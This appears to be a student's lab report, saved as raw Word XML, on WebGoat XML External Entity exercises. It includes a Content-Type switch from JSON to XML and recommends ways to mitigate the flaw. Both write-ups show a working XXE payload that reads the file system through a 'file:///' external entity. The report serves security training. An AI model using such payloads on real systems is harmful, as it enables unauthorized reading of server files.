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BDBD8" w14:textId="10A65B40" w:rsidR="00240030" w:rsidRDefault="00E212D1" w:rsidP="00954A59">
      <w:r>
        <w:t>CYBR 350</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1B4578" w14:textId="0276BC2B" w:rsidR="00E212D1" w:rsidRDefault="00E212D1" w:rsidP="00954A59">
      <w:r>
        <w:t xml:space="preserve">Week # 7 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2227392D" w14:textId="1D7CE262" w:rsidR="00E212D1" w:rsidRDefault="00E212D1" w:rsidP="00954A59">
      <w:r>
        <w:t>WebGoat</w:t>
      </w:r>
      <w:r w:rsidR="00916680">
        <w:t xml:space="preserve"> Assignment </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004B0F86" w14:textId="6F49048A" w:rsidR="00916680" w:rsidRDefault="00916680" w:rsidP="00954A59">
      <w:r>
        <w:t>Abby Gopal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B53B74F" w14:textId="01830E70" w:rsidR="00240030" w:rsidRPr="00A42FA2" w:rsidRDefault="00240030" w:rsidP="00240030">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A42FA2">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>A 5 Security Misconfigurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D4CDC9" w14:textId="1324E0A9" w:rsidR="00240030" w:rsidRPr="00240030" w:rsidRDefault="00240030" w:rsidP="005F5BF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00240030">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>XXE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0737B405" w14:textId="77777777" w:rsidR="00240030" w:rsidRDefault="00240030" w:rsidP="00954A59"/>
    <w:p w14:paraId="0268840C" w14:textId="0FF407E9" w:rsidR="00240030" w:rsidRPr="00A42FA2" w:rsidRDefault="00A42FA2" w:rsidP="00A42FA2">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>A5 -</w:t>
      </w:r>
      <w:r w:rsidRPr="00A42FA2">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Let’s Try</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1A110C" w14:textId="3D8ADE83" w:rsidR="00954A59" w:rsidRDefault="00954A59" w:rsidP="00954A59">
      <w:r>
        <w:t>Exercise Title and Objective: "WebGoat XXE Attack and Mitigation Assessment"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260CF0B9" w14:textId="48ED127B" w:rsidR="00954A59" w:rsidRDefault="00954A59" w:rsidP="00954A59">
      <w:r>
        <w:t>Objective: Evaluate the susceptibility of WebGoat to XML External Entity (XXE) attacks and provide recommendations for mitigating identified vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597BAA52" w14:textId="150F92DB" w:rsidR="00954A59" w:rsidRDefault="00954A59" w:rsidP="00954A59"/>
    <w:p w14:paraId="7841DFB5" w14:textId="598CA63E" w:rsidR="00954A59" w:rsidRDefault="00954A59" w:rsidP="00954A59">
      <w:r>
        <w:t>Methodology: The exercise utilized ZAP/Burp as intercepting proxies to manipulate XML requests and test for XXE vulnerabilities in the WebGoat application. The focus was on including a custom Document Type Definition (DTD) to trigger XXE and assess the system's response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12300D61" w14:textId="2824F25E" w:rsidR="00954A59" w:rsidRDefault="00954A59" w:rsidP="00954A59"/>
    <w:p w14:paraId="587E07FF" w14:textId="119267E1" w:rsidR="00954A59" w:rsidRDefault="00954A59" w:rsidP="00954A59">
      <w:r>
        <w:t>Steps Taken:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76059F98" w14:textId="3A99DC3F" w:rsidR="00954A59" w:rsidRDefault="00954A59" w:rsidP="00954A59"/>
    <w:p w14:paraId="50C881E1" w14:textId="2FA4523C" w:rsidR="00954A59" w:rsidRDefault="00954A59" w:rsidP="004B4FE2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Opened WebGoat and navigated to the comment posting feature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372B71BA" w14:textId="7994394B" w:rsidR="00954A59" w:rsidRDefault="00954A59" w:rsidP="004B4FE2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Used ZAP/Burp as an intercepting proxy to capture and modify the XML request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B6B002" w14:textId="1FB5A60A" w:rsidR="00954A59" w:rsidRDefault="00954A59" w:rsidP="004B4FE2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Included a custom DTD in the XML payload: &lt;!DOCTYPE comment [&lt;!ENTITY </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> SYSTEM "file:///"&gt;]&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338B027C" w14:textId="033D0AEF" w:rsidR="00954A59" w:rsidRDefault="00954A59" w:rsidP="004B4FE2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Referenced the entity in the comment body: &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>;.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="76EB2D01" w14:textId="26D93B99" w:rsidR="00954A59" w:rsidRDefault="00954A59" w:rsidP="00164C91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34984BAD" w14:textId="4E6E8562" w:rsidR="004B4FE2" w:rsidRDefault="004B4FE2" w:rsidP="00954A59"/>
    <w:p w14:paraId="372A7706" w14:textId="20D58A64" w:rsidR="00954A59" w:rsidRDefault="00954A59" w:rsidP="00954A59">
      <w:r>
        <w:t>Results and Findings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7324FE2A" w14:textId="13573BCF" w:rsidR="00954A59" w:rsidRDefault="00954A59" w:rsidP="00954A59"/>
    <w:p w14:paraId="6D377B0E" w14:textId="1D35F277" w:rsidR="00954A59" w:rsidRDefault="00954A59" w:rsidP="004B4FE2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Vulnerabilities Discovered: Successfully triggered XXE vulnerability in WebGoat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0478B436" w14:textId="62BAFA71" w:rsidR="00954A59" w:rsidRDefault="00954A59" w:rsidP="004B4FE2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Data or Access Gained: </w:t>
      </w:r>
      <w:r w:rsidR="003949A3">
        <w:t>Access</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to file system information </w:t>
      </w:r>
      <w:r w:rsidR="003949A3">
        <w:t xml:space="preserve">was obtained </w:t>
      </w:r>
      <w:r>
        <w:t>through the XXE attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A6334A" w14:textId="737955A4" w:rsidR="00954A59" w:rsidRDefault="00954A59" w:rsidP="004B4FE2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Unexpected Outcomes: XXE attack revealed potential risks of unauthorized data access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740A7625" w14:textId="3ADFD4A6" w:rsidR="00954A59" w:rsidRDefault="00954A59" w:rsidP="004B4FE2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Analysis and Conclusions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50636898" w14:textId="6D6425C7" w:rsidR="00954A59" w:rsidRDefault="00954A59" w:rsidP="004B4FE2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The findings underscore the significance of mitigating XXE vulnerabilities to prevent unauthorized access to sensitive data. In a real-world scenario, such exploits could lead to data breaches and compromise system integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B07280" w14:textId="351B736D" w:rsidR="00954A59" w:rsidRDefault="00954A59" w:rsidP="00954A59"/>
    <w:p w14:paraId="5C2565D3" w14:textId="54B75A9B" w:rsidR="00954A59" w:rsidRDefault="00954A59" w:rsidP="00954A59">
      <w:r>
        <w:t>Recommendations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C03AE0" w14:textId="032029FA" w:rsidR="00954A59" w:rsidRDefault="00954A59" w:rsidP="00954A59"/>
    <w:p w14:paraId="669F7A71" w14:textId="68C667EE" w:rsidR="00954A59" w:rsidRDefault="00954A59" w:rsidP="00954A59">
      <w:r>
        <w:t>Implement proper input validation to sanitize XML input and prevent XXE attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F291D71" w14:textId="7B4FE2C1" w:rsidR="00954A59" w:rsidRDefault="00954A59" w:rsidP="00954A59">
      <w:r>
        <w:t>Utilize secure coding practices to avoid reliance on user-controlled input for XML parsing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375B2A1B" w14:textId="2E1D0CDE" w:rsidR="00954A59" w:rsidRDefault="00954A59" w:rsidP="00954A59">
      <w:r>
        <w:t>Regularly update and patch XML parsers to address known vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6B0E2C" w14:textId="055ED776" w:rsidR="00954A59" w:rsidRDefault="00954A59" w:rsidP="00954A59">
      <w:r>
        <w:t>Reflection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C976C01" w14:textId="3A26BB42" w:rsidR="00495B8B" w:rsidRDefault="00954A59" w:rsidP="00954A59">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">This exercise highlighted the importance of understanding and mitigating XXE vulnerabilities in web applications. In the future, a more thorough analysis of input validation mechanisms and secure coding practices would be essential to enhance </w:t>
      </w:r>
      <w:r w:rsidR="003949A3">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t>overall security posture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D69C30" w14:textId="77777777" w:rsidR="003B03A9" w:rsidRDefault="003B03A9" w:rsidP="00954A59"/>
    <w:p w14:paraId="0310859F" w14:textId="77777777" w:rsidR="003B03A9" w:rsidRDefault="003B03A9" w:rsidP="00954A59"/>
    <w:p w14:paraId="708A61EB" w14:textId="6F32987A" w:rsidR="00FE7C0D" w:rsidRDefault="00954A59" w:rsidP="00954A59">
      <w:r>
        <w:t>References:</w:t>
      </w:r>
      <w:r w:rsidR="00ED5483">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Burp Suite Documentation</w:t>
      </w:r>
      <w:r w:rsidR="004B4FE2">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>WebGoat Project Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7668EAC2" w14:textId="614321FD" w:rsidR="004E1E9E" w:rsidRDefault="004E1E9E" w:rsidP="00954A59"/>
    <w:p w14:paraId="2DD03640" w14:textId="3C8D004D" w:rsidR="004E1E9E" w:rsidRDefault="006314A7" w:rsidP="00954A59">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D10A6C5" wp14:editId="52EBCB0C">
            <wp:extent cx="2860636" cy="1519254"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="6645724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72422"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6961" cy="1586344"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08516696" wp14:editId="10561EE4">
            <wp:extent cx="2698028" cy="1432895"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="196788881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88817" name="Picture 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6318" cy="1495718"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9296D8" w14:textId="35A4B055" w:rsidR="004E1E9E" w:rsidRDefault="004E1E9E" w:rsidP="00954A59"/>
    <w:p w14:paraId="714D6D2B" w14:textId="69E910DA" w:rsidR="004E1E9E" w:rsidRDefault="004E1E9E" w:rsidP="00954A59"/>
    <w:p w14:paraId="41C28663" w14:textId="7E19F683" w:rsidR="004E1E9E" w:rsidRDefault="004E1E9E" w:rsidP="00954A59"/>
    <w:p w14:paraId="2B3E0497" w14:textId="3EF1E163" w:rsidR="004E1E9E" w:rsidRDefault="004E1E9E" w:rsidP="00954A59"/>
    <w:p w14:paraId="72284737" w14:textId="35C874FC" w:rsidR="004E1E9E" w:rsidRDefault="004E1E9E" w:rsidP="00954A59"/>
    <w:p w14:paraId="6E27378C" w14:textId="0BAC9103" w:rsidR="004E1E9E" w:rsidRDefault="004E1E9E" w:rsidP="004E1E9E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1E9E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">A 5 </w:t>
      </w:r>
      <w:r w:rsidR="003C3023">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00A42FA2">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> XXE</w:t>
      </w:r>
      <w:r w:rsidR="003C3023">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="004E1E9E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Modern REST Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5081600E" w14:textId="2DBAE3F8" w:rsidR="00BE5C4F" w:rsidRDefault="00BE5C4F" w:rsidP="004E1E9E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06550811" w14:textId="17C1018E" w:rsidR="00BE5C4F" w:rsidRPr="00BE5C4F" w:rsidRDefault="00BE5C4F" w:rsidP="00BE5C4F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE5C4F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Exercise Title and Objective: "Content-Type Manipulation and XXE Attack on WebGoat"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072337FE" w14:textId="37259672" w:rsidR="00BE5C4F" w:rsidRPr="00BE5C4F" w:rsidRDefault="00BE5C4F" w:rsidP="00BE5C4F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE5C4F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Objective: Assess the security of WebGoat by attempting to manipulate the Content-Type header and execute an XML External Entity (XXE) attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D27B2A5" w14:textId="5A8902DE" w:rsidR="00BE5C4F" w:rsidRPr="00BE5C4F" w:rsidRDefault="00BE5C4F" w:rsidP="00BE5C4F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26FD624F" w14:textId="20E4B497" w:rsidR="00BE5C4F" w:rsidRPr="00BE5C4F" w:rsidRDefault="00BE5C4F" w:rsidP="00BE5C4F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE5C4F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Methodology: Utilized the browser's Development Tools and Network tab to intercept and modify HTTP requests. Attempted to manipulate the Content-Type header from "application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE5C4F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE5C4F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>" to "application/xml" and performed an XXE attack on the WebGoat comment endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B1443E" w14:textId="1580BE33" w:rsidR="00BE5C4F" w:rsidRPr="00BE5C4F" w:rsidRDefault="00BE5C4F" w:rsidP="00BE5C4F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6893ECAA" w14:textId="3E59BD7E" w:rsidR="00BE5C4F" w:rsidRPr="00BE5C4F" w:rsidRDefault="00BE5C4F" w:rsidP="00BE5C4F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE5C4F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Steps Taken:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEB366A" w14:textId="79B1542A" w:rsidR="00BE5C4F" w:rsidRPr="00BE5C4F" w:rsidRDefault="00BE5C4F" w:rsidP="00BE5C4F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13932F44" w14:textId="4ED55D29" w:rsidR="00BE5C4F" w:rsidRDefault="00BE5C4F" w:rsidP="00164C91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00164C91">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Opened WebGoat and accessed the comment posting feature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78636A21" w14:textId="2FA2095B" w:rsidR="000855F2" w:rsidRPr="000855F2" w:rsidRDefault="000855F2" w:rsidP="000855F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Used ZAP/Burp as an intercepting proxy to capture and modify the XML request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1089045F" w14:textId="597E0FB8" w:rsidR="00BE5C4F" w:rsidRPr="00164C91" w:rsidRDefault="00BE5C4F" w:rsidP="00164C91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00164C91">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Examined the initial request in the Network tab to identify the Content-Type header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73795A9E" w14:textId="205696A6" w:rsidR="00BE5C4F" w:rsidRPr="00164C91" w:rsidRDefault="00BE5C4F" w:rsidP="00164C91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00164C91">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Edited the request, changing Content-Type from "application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00164C91">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00164C91">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>" to "application/xml."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119662C0" w14:textId="521445AB" w:rsidR="00BE5C4F" w:rsidRPr="00164C91" w:rsidRDefault="00BE5C4F" w:rsidP="00164C91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00164C91">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Modified the request body with an XXE payload: &lt;?xml version="1.0"?&gt;&lt;!DOCTYPE comment [&lt;!ENTITY </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00164C91">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00164C91">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> SYSTEM "file:///"&gt;]&gt;&lt;comment&gt;&lt;text&gt;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00164C91">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00164C91">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>;&lt;/text&gt;&lt;/comment&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5592D1F8" w14:textId="77777777" w:rsidR="00164C91" w:rsidRDefault="00164C91" w:rsidP="00BE5C4F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16F08E12" w14:textId="738F75F5" w:rsidR="00BE5C4F" w:rsidRPr="00BE5C4F" w:rsidRDefault="00BE5C4F" w:rsidP="00BE5C4F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE5C4F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Results and Findings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2586FC04" w14:textId="49A0AAAE" w:rsidR="00BE5C4F" w:rsidRPr="00BE5C4F" w:rsidRDefault="00BE5C4F" w:rsidP="00BE5C4F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="467EF720" w14:textId="2557AA20" w:rsidR="00BE5C4F" w:rsidRPr="00C836BA" w:rsidRDefault="00BE5C4F" w:rsidP="00C836BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C836BA">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Vulnerabilities Discovered: Successfully manipulated the Content-Type header and executed an XXE attack on the WebGoat comment endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDB6005" w14:textId="695BDA80" w:rsidR="00BE5C4F" w:rsidRPr="00C836BA" w:rsidRDefault="00BE5C4F" w:rsidP="00C836BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C836BA">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Data or Access Gained: Obtained access to file system information through the XXE attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFF47AD" w14:textId="4EDB193C" w:rsidR="00BE5C4F" w:rsidRPr="00C836BA" w:rsidRDefault="00BE5C4F" w:rsidP="00C836BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C836BA">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Unexpected Outcomes: Illustrates the risk of content type manipulation leading to unexpected processing of payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6417C503" w14:textId="725A65C3" w:rsidR="00C836BA" w:rsidRDefault="00C836BA" w:rsidP="00BE5C4F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="756DA9F6" w14:textId="033E47E3" w:rsidR="00BE5C4F" w:rsidRPr="00BE5C4F" w:rsidRDefault="00BE5C4F" w:rsidP="00BE5C4F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE5C4F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Analysis and Conclusions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1E34C9" w14:textId="52AA8227" w:rsidR="00BE5C4F" w:rsidRPr="00BE5C4F" w:rsidRDefault="00BE5C4F" w:rsidP="00BE5C4F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE5C4F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>The exercise highlights the significance of validating and enforcing the correct Content-Type for incoming requests. Manipulating headers, even temporarily, can lead to exploitation of vulnerabilities, as demonstrated by the successful XXE attack. In a real-world scenario, such an attack could compromise system integrity and expose sensitive information.</w:t>
      </w:r>
    </w:p>
